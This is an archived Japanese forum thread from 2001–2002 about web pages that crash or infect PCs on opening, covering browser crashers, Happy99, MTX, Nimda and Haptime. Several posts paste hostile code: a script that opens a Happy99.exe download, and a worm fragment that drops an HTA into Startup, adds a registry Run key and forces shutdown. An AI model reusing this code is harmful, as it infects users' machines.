開いただけでPCがハングアップするページはありますか?
あなたの心です
あなたの人生です
この板、まったりしていてイカすなあ
関係無いけど、hsjさん、海外でも話題になってるね。IISエクスプロイチー の件で。
sage
私は便器です。
9 :
どうよ? :2001/07/11(水) 21:26
↑IP抜かれるだけだし俺にはもう効かん
聞いただけでウイルスに感染するページ
12 :
名無しさん@お腹いっぱい。 :2001/07/11(水) 22:51
13 :
名無しさん@お腹いっぱい。 :2001/07/11(水) 23:52
age
14 :
名無しさん@お腹いっぱい。 :2001/07/12(木) 03:52
16 :
名無しさん@お腹いっぱい。 :2001/07/12(木) 05:42
yeds
17 :
名無しさん@お腹いっぱい。 :2001/07/13(金) 17:53
18 :
17 :2001/07/13(金) 18:06
19 :
17 :2001/07/13(金) 21:46
20 :
17 :2001/07/13(金) 21:58
21 :
17 :2001/07/13(金) 22:06
ホンモノの17はsageません。 したがって20はニセモノです。 20のサイトはただの宣伝です。注意。
ブラクラ張るな!
対象URL=
http://members.tripod.co.jp/casinoA1/ --------------------------------------------------------------------------------
FDDアタック / conconクラッシャー [HTMLタグ,JavaScript]
IMGタグやJavaScript等によりfileスキーマを参照します。
フロッピーディスクドライブへの不用なアクセスが続いたり,
ブラウザの設定によってはOSがクラッシュする可能性があります。
23 :
善人 :2001/07/13(金) 22:10
宣伝手伝うよ
〒292-0045 千葉県木更津市清見台3-1-11 アドオフィス
TEL&FAX 0438-25-7643
E-Mail
[email protected]
NEXTWEBに直接電話した方が早い
>>22 ソース見た限りではオンラインカジノらしいけど・・・
開いたらやヴぁいのか怖いなー
ふ〜んNEXTWEBの鯖は、公序良俗に反することは禁止なんだ
小僧相手に大人の対応しすぎ(w
____
/∵∴∵∴\
/∵∴∵∴∵∴\
/∵∴∴,(・)(・)∴|
|∵∵/ ○ \|
|∵ / 三 | 三 | / ̄ ̄ ̄ ̄
|∵ | __|__ | <
>>17 消えろバカ
\| \_/ / \____
\____/
突然子供の対応になったな(w まあ好きにやれや
反省の色無しか・・・ コピペ厨房もいい加減にしろ
31 :
名無しさん@お腹いっぱい。 :2001/07/14(土) 04:34
>>10 〜30 (ただし9は除く)
インターネット喫茶から開いたけど何も起こらなかったよ。
32 :
名無しさん@お腹いっぱい :2001/07/14(土) 21:38
210.178.180.226,sunrpc ここ。
33 :
名無しさん@お腹いっぱい :2001/07/14(土) 21:38
133.31.40.42,auth ここも良いよ。
34 :
:2001/07/14(土) 22:20
>>32 ソコのさーばーって、111がhttpなの??
35 :
名無しさん@お腹いっぱい。 :2001/07/15(日) 01:12
>>35 フレーム使った、最高にくだらないブラクラもどき。
消されたって言ってるのは、わかってる奴がネタでいってるだけ
>>37 なんすかって言われてもなあ・・・
ちょっとしたいたずらみたいなもんだよ。
そこのサイトは問題あるサイトじゃないし。
つーかブラウザのセキュリティ設定はちゃんとしとこうな
39 :
マジね :2001/07/15(日) 02:19
>>38 ブラウザのセキュリティ設定ってなんですか?串ですか?ファイアーウォールですか?
馬鹿げた質問ですみません
40 :
名無しさん@お腹いっぱい。 :2001/07/15(日) 02:32
>>39 Java、ActiveX、アクティブスクリプト、クッキーとかを
実行させるかどうかってこと。Java、ActiveXなんかは
切って当然ってぐらいだけど、アクティブスクリプト、
クッキーも結構厄介なもんだから、ダイアログを出すぐらいに
しといたほうが確実。かなり面倒だけど
まあそこらへんの設定のやり方は初心者板とかで聞いてくれや。
さすがにIEの設定まで教えてられん
______
/_ |
/ \ ̄ ̄ ̄ ̄|
/ / ― ― |
| / - - |
||| (6 > |
| | | ┏━┓| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| | | | ┃─┃| < 正直、
>>40 消えてくれ。
|| | | | \ ┃ ┃/ \________________
| || | |  ̄  ̄|
>>40 昨日のやつか?まだ懲りてないなら、
「大人の対応」させてもらうが。
44 :
マジね :2001/07/15(日) 02:38
45 :
名無しさん@お腹いっぱい。 :2001/07/15(日) 02:52
邪魔物はお前だろうが(藁 まぁせいぜいアクセス制限掛けられないようにな
あぼーん
リンクたどっただけとの噂
53 :
>50 :2001/07/19(木) 23:39
凄い!ほんとスーパーハカーどうぢてこんなことが可能なのか? 尊敬!
54 :
>36 :2001/07/20(金) 16:25
>35さんのURL、他の板でウイルスだとか逝ってましたが どんな悪さをするんでしょうか?
55 :
浅野 哲 :2001/07/20(金) 16:30
マジでお願い〜
だからなんもしねえっての。 人の言う事信じられないなら自分でソース見て考えろよ
ただ繰り返しドライブがカタカタ言うだけ。 ctrl+alt+delで殺して終わり。
61 :
:2001/08/03(金) 15:55
______
/_ |
/ \ ̄ ̄ ̄ ̄|
/ / ― ― |
| / - - |
(6 > |
┏━┓| / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
┃─┃| < 正直、
>>40 消えてくれ。
\ ┃ ┃/ \________________
 ̄  ̄|
あぼーん
URL貼れば誰か荒らしてくれるとでも思ってんの?
65 :
名無しさん@お腹いっぱい。 :2001/08/04(土) 04:35
67 :
名無しさん@お腹いっぱい。 :2001/08/04(土) 14:56
68 :
名無しさん@お腹いっぱい。 :2001/08/05(日) 14:13
69 :
名無しさん@お腹いっぱい。 :2001/08/06(月) 18:39
203.165.230.223
70 :
MKinch :2001/08/06(月) 19:21
71 :
名無しさん@お腹いっぱい。 :2001/08/06(月) 21:27
>>70 あなたは感染ファイルのダウンロードを試みようとしています(藁
72 :
名無しさん@お腹いっぱい。 :2001/08/07(火) 00:36
>>70 -71
これって続行したらどうなるの?WinMeでも感染しちゃうのかな>>happy99
--------------------------- Norton AntiVirus --------------------------- Norton AntiVirus は Happy99.Worm ウィルスを以下の場所で検出しました ファイル名: (略)\Temporary Internet Files\Content.IE5\W1AFG9IF\Happy99[1].exe ドメイン名:(秘密) システム名: (秘密) ユーザー名:(秘密) このファイルを修復できません。 --------------------------- OK ---------------------------
75 :
名無しさん@お腹いっぱい。 :2001/08/08(水) 07:42
76 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 21:24
>>75 それ何?
拡張子mp3で感染することなんてあるの?
>>75 MTXだって(W
本当の拡張子.pifでしょ。
78 :
偽天 :2001/08/21(火) 21:51
バインド?
79 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 22:58
80 :
あげ :2001/08/22(水) 07:51
ぱくりアゲ
81 :
初心者 :2001/08/22(水) 10:43
感染するとどうなるんですか? あとQ2とかは勝手にインストールされてしまうらしいって 聞いたのですが、よくわかりません。 教えて下さい。 簡単なチェック方法きぼ〜〜ん
82 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 14:24
83 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 15:13
84 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 15:25
ポートスキャンされてる時にゾーンアラームなどの ファイアウォールソフト入れてないと侵入されますか?
85 :
:2001/08/22(水) 15:28
>>82 ブラウザぢゃ開けないよ。あくまでMP3として認識するみたいね。
ってーか、拡張子けづってあるのか??>hiros
ローカルに保存して実行するのはよした方が良いね。一応念のため。
>>83 その表示でる頃には我慢汁出てるから。。巧妙だね。
86 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 16:01
おまえなんでまだ居るんだよ いい加減自首してくれ
僕のポテトはチンチンチン チンチンポテトマイクロマジックー♪
88 :
名無しさん@お腹いっぱい。 :01/08/30 15:53 ID:q9bARPwE
89 :
名無しさん@お腹いっぱい。 :01/08/30 16:37 ID:ruy2juu2
俺昔MP3ダウンロードしたとき、ファイルサイズが5Mにもなるのに、 音が鳴らなかった。他のファイルは音が鳴るのに、それだけはダメだった。 やばいと思って再インストールしたが、あれはウイルスだったんだろうか…
>>89 ネタでしょうが、ウィルスなはずが無いです。仮にウィルスのコードが埋め込まれていうようが
実行ファイルでないのでウィルスを起動できません。
何かの偽装ファイルじゃないでしょうか
91 :
tomo :01/08/31 14:57 ID:4t1V4bfM
あったらほしいんだけど。
92 :
名無しさん@お腹いっぱい。 :01/09/01 17:50 ID:ozIMKsQc
93 :
89 :01/09/02 00:43 ID:wivt7Qp.
>>90 それが再生できるんで…
それからさっぱりアングラMP3はダウソしてない。
94 :
名無しさん@お腹いっぱい。 :01/09/02 00:45 ID:3OHXOh8o
95 :
名無しさん@お腹いっぱい。 :01/09/02 03:14 ID:pbL3/KjU
しつもん。
>>50 ってマジ?
マジなら凄いんじゃない?
なぜみんなもっと驚かない?
リンクたどって調べただけだからね
97 :
名無しさん@お腹いっぱい。 :01/09/07 01:54
>89 それ、バイナリエディタとかでデータ確かめてみた? 俺も似たようなことあったよ。 KturnってとこからダウソしたMP3、再生しても音ならず。 なして?と思ってデータ確かめたら、ヘッダはあれど肝心の音データは 全部000000000・・・・・・・・・・・だった。 おっそろしく回線細く、数時間かけて落としたのに・・・ そこにあった別のMP3はちゃんとしてたから、UPした人のポカミスか?? 意味分からん・
>>93 インプラント系偽装でしょ
表向きはmp3だけど中に他のデータが入ってるの。
割れとかで良くある。
W97M.Melissa.A に感染したらどうなるの? さっき踏んじゃってさ、オイラのPC染みちゃってるのさ。
101 :
名無しさん@お腹いっぱい。 :01/09/10 23:00
>>101 <script language="javascript">
w=window.open("
http://#古臭いリンク貼るなボケ !/newtype/Happy99.exe");
</script>
<script language="javascript">
w=window.open("
http://#全く ・・・・/newtype/list.doc");
</script>
<script language="javascript">
w=window.open("7777.htm");
</script>
ココで引っかかる奴は居まいと思うけど。。。
この前ブラクラで再起動したら変な画面出たよ、 英語でなんか「yes,no]って書いてあったからノーにしといた。何だったんだか気になる。
あぼーん
↑犯罪者発見。
107 :
名無しさん@お腹いっぱい。 :01/09/11 14:40
>>106 javascriptをonにしてなければ怖くない。
onにしてると、オトコの裸画像数点+VBS.LoveLetter.CI+W95.MTX.dr+ウィンド無限オープン。
109 :
名無しさん@お腹いっぱい。 :01/09/11 19:03
***/***** ***? *** *** ***
>>103 心配だったらOS再インストールするほうがいいんじゃない?
とりあえずウイルススキャンしたほうがいいですね。
先月から今月にかけてMP3のsma****anet逝ったやつはどうだった? 運が悪いことに最近mcafeeのサポートが切れてアンインストールしてた。 俺はjava他全て切ってたけど感染する寸前だったよ。 途中で変に読み込み遅かったから気が付いたからよかったけど。 再起動したら壁紙変えられた。 haptimeとか言うやつで。 開いただけで感染するページあるんだなと思った。
114 :
名無しさん@お腹いっぱい。 :01/09/16 20:54
亀スレならすまんが、相手のコンピューター破壊できるウイルスと どんな警戒厳重なコンピューターでもハッキングできる方法教えてくれ。 開いただけで感染するなんて、メチャ欲しいんだけど
>114 狂牛病?
>>114 ____ ____
|自分で| ___ |見つけた |
|さがせ:|Λ_Λ |イッテヨシ| Λ_Λ|ら報告 |Λ_Λ
〃  ̄ ∩ ´∀`)〃 ̄ ∩ ゚Д゚)〃  ̄ ̄ ∩ ・∀・)
ヾ. ) ヾ | ヾ. )
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ \
\ \
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
| スレッド評価認定委員会: |
| |
\| |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
117 :
名無しさん@お腹いっぱい。 :01/09/16 22:28
GodmessageとかNood4ってどうなのよ? 感染した人いる?
119 :
名無しさん@お腹いっぱい。 :01/09/17 00:59
そんな事いわれたら飛べない・・・
122 :
名無しさん@お腹いっぱい。 :01/09/18 17:50
123 :
名無しさん@お腹いっぱい。 :01/09/18 17:54
直リソ&説明不足スマソ。 たまたま巡回してて、↑のサイトに飛んだら突然ノートン先生が 警告したのでビックリして、気が動転していたようです。 身をもって体験して来たんですが…。 結果からいうと、どうやら『自分は』感染しなかったようです。 ノートンで何度もスキャンしたし、haptime専用駆除ツールも使ってみた のですが、一切検出されませんでした。 しかし、だからといって他の人が安全とは限りませんので、 自分で直林しといていうのもなんですが、 決して不用意にクリックしないでください。 今まで自分は飛んだだけでウィルスに感染するとは思っていなかったので、 ノートンで警告が出て??だったので、なにも知らずにリンク張ってしまい すいませんでした。 しかし、飛んだだけでウィルスに感染なんて怖いですね。 みなさんも気をつけてください。なんでもない安全なサイトでも 感染していることがあるようですから。
なんとタイムリーなスレタイトルじゃのう
>>124 不用意にリンクをクリックする奴も悪い。
ここの住人は引っかかったりしないから気にするな
ごめ、俺おみとろん入れてから不用意にクリックしまくってるよ。 んで120はまだ踏んでないけど、ActiveXとかJSオフとかでも感染するの? どういうしくみなんだろ?つか>122のリンク先がおかしいんだけど・・・
128 :
名無しさん@お腹いっぱい。 :01/09/19 12:39
129 :
名無しさん@お腹いっぱい。 :01/09/19 13:43
お粗末msn さらしあげ。
130 :
名無しさん@お腹いっぱい。 :01/09/19 17:31
お粗末マイクロソフト さらしあげ
131 :
名無しさん@お腹いっぱい。 :01/09/20 00:31
こんかいのNimdaでもトレンドマイクロ対応遅かったね。 これでウイルスバスターがクソだということがハッキリしたよ。
132 :
名無しさん@お腹いっぱい。 :01/09/20 00:40
ウイルスっていうか、マイ糞のバグだからマイ糞が悪い。 マイ糞のセキュリティ=ヤリ○ン女
あげ
134 :
名無しさん@お腹いっぱい。 :01/09/20 09:18
どうしてみんなは 「Windowsが欠陥品である」 と言うことに気がつかない? 見ただけで勝手に何かを実行するなんて言う考えは 根本的に間違い。 こんな基地外であるMicro$oftは、早く潰れて下さい。 1番悪いのは、ビルゲイツです。 商売以外にももうちょっと頭使って下さい で2番目にに悪いのが、ウィルス作成者。 いくらWindowsがショボイと言っても、 そんなことやってはいけません。 3番目に悪いのは、それに気がつかずM$製品を使う 厨房ユーザー(藁
135 :
名無しさん@お腹いっぱい。 :01/09/20 09:43
>>134 WindowsNTを使うにせよ、IISをやめてApacheでやってくれてたら
防げた被害なんですけどね、最近のCodeRedとかNimdaは。
それはともかく、感染したオリコ
http://www.orico.co.jp/ のトップページには、「お知らせ」と題して、
9/19 11:30〜21:30までの間、システムメンテナンスの為
サーバを停止しました。ご迷惑をお掛けして申し訳ござい
ませんでした。
と書いてあるよ。迷惑かけたのはサーバ停止じゃなくって
ウイルス感染の踏み台になったことだっていうのに、一言
もなし。どうよこれ。
>>137 ほんとか?
クライアントのPCが感染していて書き換えられたHTMLファイルをApacheサーバーに
アップロードして公開すれば、Apacheだって加害者になるんじゃないのか?
ワームとしては感染しなくてもクライアントがWindowsなら危険度は変わらないと思うが。
>>137 コンテンツ作成者のPCに感染して、HD 内の HTML を汚染されて、それを
apache (UNIX でも何でも) なり何なりに upload して公開した時点で
加害者になると思われ。
140 :
名無しさん@お腹いっぱい。 :01/09/20 11:24
IEでJavaScript切るのはどうやるんですか?
141 :
名無しさん@お腹いっぱい。 :01/09/20 11:41
>>138 -139
自動で増殖する機構がないぶんヨホードましかと思われ。
>>137 ApacheはNimdaの影響で落ちるらしいよ。
143 :
名無しさん@お腹いっぱい。 :01/09/20 11:47
漏れ、19日の朝、建築ナビってHPみたら、Readme.exeもらいました。 HPは現在落ちてるもよう。 McAfee ウイルススキャン Ver. 5.13aの最新Datファイルで削除したよ。 7匹もいた。でも*.emlはそのまま130個もあったよ。即削除。全部80.0KBだった。 あれはウィルスの卵だね。ダブルクリックすると生まれるよ。
144 :
名無しさん@お腹いっぱい。 :01/09/20 12:10
>>138 ダウンロードすべき本体がいないと思うが。
>>142 それはApacheログがHDDを圧迫して落ちるらしい。
同じIPで4段5段のアタックをかましてくるからなぁ。
nimdaウザッ
phpウイルスの作成ツール出たら、どうなる事やら。。。
147 :
名無しさん@お腹いっぱい。 :01/09/20 12:35
>>145 うちじゃ,logrotate.conf を daily にしたよ.しゃあ
ないわね.
148 :
名無しさん@お腹いっぱい。 :01/09/20 13:52
かちゅーしゃでも感染するんですか?
149 :
名無しさん@お腹いっぱい。 :01/09/20 20:47
>>140 やれやれ.....。
そういう人はブラウザのセキュリティレベルを「高」に設定しておきな。ワクチンもきちんと更新しろよ。
150 :
nimda :01/09/20 22:42
あぼーん
>>151 どうせ、むかつく奴とかのメアドだろ・・・
はい、そうですか と送るバカいるのか?
154 :
FUCK usa :02/01/01 23:10
155 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
156 :
名無しさん@お腹いっぱい。 :02/01/01 23:47
>>155 のソースをメモ帳で拡張子HTMLで保存。 そして実行する
なんか…
158 :
名無しさん@お腹いっぱい。 :02/01/02 16:37
これも
あれですね。
yahooもアホ揃いか。
163 :
名無しさん@お腹いっぱい。 :02/01/02 19:23
YAHOO!のNEWSからきました!
167 :
名無しさん@お腹いっぱい。 :02/01/05 02:35
なんかいろんな所で
>>155 が紹介されてるけど
これってインターネット上にある場合は警告でない?
見ただけでは問題ないと思うけど。
そりゃ保存してローカル権限でみたらまずいだろうけど。
だから、ネット上には保存してローカル権限で見させるページ作ればいいんじゃんか
>>168 それができれば苦労しないが。(何の苦労だか(w
それともなんかローカル権限で見させるセキュリティーホールでも有るの?
>>169 あふぉ、それくらい自分で作れないなら逝ってよし
>>170 だからそれが出来たら大問題でしょ。
古いセキュリティーホール使ってやるって事なら出来ないと一緒。
作れるならどうやって作るか説明してくれ。
俺はせいぜいGetHTMLとかのツールでサイトを丸ごと落とさせるような
サイトを作ってそこに仕込むぐらいの事しか思いつかん。
172 :
名無しさん@お腹いっぱい。 :02/01/06 01:42
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From:
[email protected] Message-ID:<
[email protected] >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email
[email protected] Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to
[email protected] ...Thanks
http://www.em5000.com/[email protected] http://www.em5000.com/[email protected] -----
mta05-svc.ntlworld.com
<<< 220
[email protected] ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250
[email protected] >>> MAIL FROM:<"TEST
http://www.nanet.co.jp/rlytest/ requested from
[email protected] >
<<< 250 Sender <"TEST
http://www.nanet.co.jp/rlytest/ requested from
[email protected] > Ok
>>> RCPT TO:<
[email protected] >
<<< 550 relaying mail to nanet.co.jp is not allowed
netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST
http://www.nanet.co.jp/rlytest/ requested from
[email protected] <<< 501 unacceptable mail address
あぼーん
175 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
176 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
177 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
178 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
<x-html> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content="text/html; charset=iso-8859-1" http-equiv=Content-Type> <META content="MSHTML 5.00.2614.3500" name=GENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=#ffffff> <DIV><FONT face=Arial size=2> <DIV><FONT face=Arial size=2>Dear Sir</FONT></DIV> <DIV> </DIV> <DIV><FONT face=Arial size=2>Iam a new learner of HTML . My question , suppose my main file is "index.html" and I want to go to another file "main.html" with a password what I have to do , will it require a cgi script to doing so . So kindly help me by giving the source code for such a html file.</FONT></DIV> <DIV><FONT face=Arial size=2></FONT> </DIV> <DIV><FONT face=Arial size=2>Thanks</FONT> <BR><BR><FONT face=Arial size=2>From :</FONT></DIV> <DIV><FONT face=Arial size=2>name_omitted , India, Jabalpur</FONT></DIV> <DIV><FONT face=Arial size=2>e-mail : <A href="mailto:email_address_omitted">email_address_omitted</A> </FONT></DIV> <DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"> <OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr name=Patsisnameit></OBJECT></DIV></FONT></DIV> <DIV> <DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5"> <OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr name=Patsisnameit></OBJECT></DIV> <SCRIPT><!--
180 :
ひみつの検疫さん :2024/12/22(日) 17:17:23 ID:MarkedRes
汚染を除去しました。
181 :
名無しさん@お腹いっぱい。 :02/01/07 03:54
sage
;t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft \\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cDays\"=\"C:\\\\\\\\WINDOWS \\\\\\\\help\\\\\\\\days.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run (wd+'Regedit.exe -s '+wd+'day.reg');t3=fs.CreateTextFile(wd+'COMMAND\\\\default.htm',1);t3.Write ('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT name= Patsisnameit id=scr classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC></"+"OBJECT></"+"DIV>') ;t4=fs.OpenTextFile(d2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function Pats() {return true;}window.onerror=Pats;scr.Reset();scr.doc=\"Z');rs=t4.Read(4192);t4.close();rd=/\\\\/g;re= /\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3. WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path =(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Demarrer\\\\\\\\Programmes\\\\\\\\Demarrage\\\\\\\\day.hta \":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\day.hta\";agt=navigator. userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf (\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>') ;t3.close();fs.GetFile(wd+'COMMAND\\\\default.htm').Attributes=2;fs.DeleteFile(wd+'day.reg');d=new Date() ;if(d.getDate()==11 && d.getHours()>16){alert('Days It was a day to be a days!');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 Scan Memory Driver";la=(navigator.systemLanguage)?navigator. systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Demarrer\\Programmes\\Demarrage\\day.hta": "C:\\windows\\Start Menu\\Programs\\StartUp\\day.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1) &&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write(); //--></SCRIPT> </OBJECT></DIV></BODY></HTML> </x-html>
このスレをカチューシャでみたらNIS2002 がログをウイルスと断定、削除しました
184 :
名無しさん@お腹いっぱい。 :02/01/07 15:09
>>183 おらも同じだ。
「ホットゾヌ」だけど、やっぱりノートンが「ログの中にウイルスがいる」と
警告してきた。
おめでとうございます。 初出勤今日は当然ドゴールです。 久しく革靴履いて歩いていないので今日はきつめの印象であります。 年末にビッチリと自分なりの手入れをしたため今日は履き心地は別にして気分がいいです。 とにかくビガビガです。 実は奥さんと3歳の息子にまで怒られながらも家でビデオ鑑賞の際などに履いていましたので初日ではないのですが、やはり気に入った靴で出勤した日は気分いいものです。 それでは今年もよろしくお願いします。
187 :
名無しさん@お腹いっぱい。 :02/01/07 15:58
>>183-184 NPF2001だと、なにも検出しなかったよ
やっぱり新しいのがいいのかなぁ
188 :
名無しさん@お腹いっぱい。 :02/01/07 16:56
あぼーん
ココのスレをあらゆるところにリンクしたらそれは悲惨になりそうな予感
悪いものは悪いものなりに情報として集積することは悪いことではないけどね。
193 :
名無さん@お腹いっぱい。 :02/01/10 06:53
もうネタ切れ? しかしリンク切れているの多いなぁ NIS2002で感染するほどキツイのないし・・
>>194 HTTP/1.1 200 OK
Date: Sat, 12 Jan 2002 04:44:11 GMT
Server: Y.G.Apache-SSLv3/1.3.9
Set-Cookie: Geoche=snRQ9cMkH000Zo91bcPBB000Tfvhc0;
domain=.geocities.co.jp; path=/; expires=Mon, 12-Jan-04 04:44:11 GMT
Last-Modified: Thu, 10 Jan 2002 09:39:59 GMT
ETag: "117f2c8-1999e-3c3d616f"
Accept-Ranges: bytes
Content-Length: 104862
Connection: close
Content-Type: image/gif
GIF89ahサ・エjFャg4ナ* bm嗚M+[ 叡6b宙p#⊇櫨チbO凱y$含・萵B,+H・Q[сワ賂-ェ・x0「
いちいちcookie仕掛けに来てうざい
From:FunnyMoney<
[email protected] >
To:
[email protected] Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:*****
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From
[email protected] Message-Id:<
[email protected] >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at
[email protected] X-PMG-Userid: funnymoney
X-PMG-Recipient:
[email protected] To remove yourself from this mailing list, point your browser to:
http://i.pm0.net/remove?funnymoney:10 Enter your email address (
[email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.
198 :
名無しさん@お腹いっぱい。 :02/01/13 00:09
>>194 え?その画像ってウィルスなの?
ただのGIFじゃないの?
>>198 拡張子はGIFだけど、実はCGIなり。
開いてるポートがあるとやばいなりよ。
面白い画像だと思ってダウンロード保存なんてしたらもっとやばいなり。
>>199 geoでどうやってcgi動かすんだよ。 (w
ばれた?(^^;
202 :
名無しさん@お腹いっぱい。 :02/01/14 03:39
>172 を解説してください。mobsync.exeがスタートアップに付くんですか?
>>202 何も起きないよ。
ただ脅して遊んでるだけ。
ここのスレJS/IEStartっていうウィルスに感染してるって出るよ。。
206 :
名無しさん@おなかいっぱい。 :02/02/05 09:29
>>206 それはMTXだよ、てか超ガイシュツだからDLするな。
210 :
名無しさん@お腹いっぱい。 :02/02/05 22:11
211 :
名無しさん@お腹いっぱい。 :02/02/06 10:37
なんだこれ
俺は海外からスパムメールがわんさか来る そのまま返信、もしくはアドレスらしきものに、 こんなメールおくるなあゴルァ!メールをだしても 宛先に不明でもどってきてしまう だれか相手の特定の仕方分かる方いませんか? 一応、メールのヘッダから相手方のIPアドレスらしきもの を見つけだしてIP検索してみたが、どうも中国から きているみたいですが
>>212 そのまま返信、もしくはアドレスらしきものに、
こんなメールおくるなあゴルァ!メールをだすな。
返信するとメールアドレスが存在することがわかり、わんさかスパムがくる。
メールヘッダを晒してくれ。(自分のアドレスなどは消す)
214 :
名無しさん@お腹いっぱい。 :02/02/06 20:48
215 :
名無しさん@お腹いっぱい。 :02/02/06 21:03
落ち着いて見れないよう。ここ。
>>214 soreha virus janai.
217 :
名無しさん@お腹いっぱい。 :02/02/06 21:21
219 :
名無しさん@お腹いっぱい。 :02/02/10 20:49
なんかないのか?
220 :
名無しさん@お腹いっぱい。 :02/02/10 20:51
714 名前:nobody 投稿日:02/02/10 18:34 175無い人には可哀想だけど、確かに175以上ないと付き合う気がしない。。 好きな人のタイプは?って聞かれて間違っても「背が高くて〜、」とかは 言わないけど、でも心の内では背が高いってのがいつの間にか条件に 入っちゃってる。高校のとき高い人と付き合って以来、高い人にしか 異性を感じなくなっちゃって。。男友達多いし、自分と同じ目線だと 同姓の友達のような親近感持ちすぎてしまふ。。
>>214 赤い文字だけで何も起きない。
顔が出てくるらしいが。
>>183-184 >>205 コピペのコードにヒットしたんだと思う。
うちでも、ノートンでファイルチェックすると
プライスロトのコード書いたテキストファイルに
反応するもん。
ごめん、さげる必要なかったね。 癖になってる
225 :
名無しさん@お腹いっぱい。 :02/02/11 06:28
>>225 対処法?んな物ねーよ!
今時そんなURL踏む厨房バカも2chには存在するのか?
どうなるか自分で体験てみろ!
報告も宜しく( ̄ー ̄) ニヤリッ
>225 踏まない事が対処法っす。
>225 凝ったウィルスだね。 これは普通の人がソース見ただけでは理解できないと思われ。
>>229 初心者でも読めるソースでしたがなにか?
231 :
名無しさん@お腹いっぱい。 :02/03/07 16:58
あう〜〜
あう〜〜あ〜
あう〜〜あ〜う〜
234 :
名無しさん@お腹いっぱい。 :02/04/05 16:19
age
235 :
名無しさん@お腹いっぱい。 :02/04/06 23:52
237 :
名無しさん@お腹いっぱい。 :02/04/30 00:20
>>206 の示したMTXって、一時ファイルとして保存されるだけで、
